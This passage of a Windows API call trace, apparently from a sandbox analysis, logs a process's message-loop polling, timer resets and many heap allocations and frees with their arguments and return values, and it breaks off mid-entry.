[0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] lstrlenW (lpString="20") returned 2 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] lstrlenW (lpString="38") returned 2 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] lstrlenW (lpString="20") returned 2 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] lstrlenW (lpString="20") returned 2 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.923] lstrlenW (lpString="38") returned 2 [0081.923] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.967] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 1 [0081.967] TranslateMessage (lpMsg=0x8cf488) returned 0 [0081.967] DispatchMessageW (lpMsg=0x8cf488) returned 0x0 [0081.967] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0081.968] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0081.968] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0240 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec328 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec208 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0290 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec298 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6ba18 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec358 [0081.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6ba18 | out: hHeap=0x2af0000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec130 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6bec8 [0081.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6bec8 | out: hHeap=0x2af0000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec670 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6bdf8 [0081.968] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6bdf8 | out: hHeap=0x2af0000) returned 1 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec610 [0081.968] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6a498 [0081.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6b8 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec358 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec130 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec670 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec298 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0290 | out: hHeap=0x2af0000) returned 1 [0081.969] lstrlenW (lpString="20") returned 2 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec610 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6a498 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec6b8 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec208 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec328 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec130 [0081.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec358 [0081.969] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0280 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec220 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0240 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec358 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec130 | out: hHeap=0x2af0000) returned 1 [0081.969] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.969] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0081.970] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0240 [0081.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0240 | out: hHeap=0x2af0000) returned 1 [0081.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec208 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.970] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec328 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec208 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec250 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec100 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2378 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0190 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2350 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec118 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec280 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e01b0 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e21c0 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1c0 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1a8 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2558 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0220 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e22b0 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0360 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.970] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3a0 | out: hHeap=0x2af0000) returned 1 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec0d0 | out: hHeap=0x2af0000) returned 1 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a4e740 | out: hHeap=0x2af0000) returned 1 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec370 | out: hHeap=0x2af0000) returned 1 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a4e700 | out: hHeap=0x2af0000) returned 1 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2c8 | out: hHeap=0x2af0000) returned 1 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec100 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec328 | out: hHeap=0x2af0000) returned 1 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec250 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0360 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2418 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0190 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e22b0 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec118 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec208 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0220 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2378 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0280 [0081.971] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2378 | out: hHeap=0x2af0000) returned 1 [0081.971] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2c8 [0081.971] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x29e01b0 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1a8 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec220 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0240 [0081.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0240 | out: hHeap=0x2af0000) returned 1 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec328 [0081.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ec0d0 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e20a8 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0240 [0081.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2580 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec280 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3a0 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0081.972] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec298 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0280 [0081.972] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec298 | out: hHeap=0x2af0000) returned 1 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2238 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec370 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0290 [0081.972] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2468 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec130 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a4e700 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec130 | out: hHeap=0x2af0000) returned 1 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2350 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec358 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec298 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e2238 | out: hHeap=0x2af0000) returned 1 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.973] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e2378 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec130 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a4e740 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1c0 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6bcb8 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6bcb8 | out: hHeap=0x2af0000) returned 1 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.973] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.973] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0081.974] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec1d8 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b3c8 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b478 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec478 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b568 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec448 [0081.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b568 | out: hHeap=0x2af0000) returned 1 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec5f8 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b558 [0081.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b558 | out: hHeap=0x2af0000) returned 1 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec538 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b568 [0081.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b568 | out: hHeap=0x2af0000) returned 1 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec568 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6b3f8 [0081.974] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec460 [0081.974] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec448 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec478 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec5f8 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec538 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec340 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b478 | out: hHeap=0x2af0000) returned 1 [0081.975] lstrlenW (lpString="20") returned 2 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec568 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b3f8 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec460 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6b3c8 | out: hHeap=0x2af0000) returned 1 [0081.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2b0 [0081.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a6bba8 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec1d8 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec3b8 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0280 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2e0 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6bba8 | out: hHeap=0x2af0000) returned 1 [0081.975] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec2b0 | out: hHeap=0x2af0000) returned 1 [0081.975] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.975] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0280 [0081.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec2e0 [0081.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec340 [0081.975] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a6b848 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec3b8 [0081.976] RtlAllocateHeap (HeapHandle=0x2af0000, 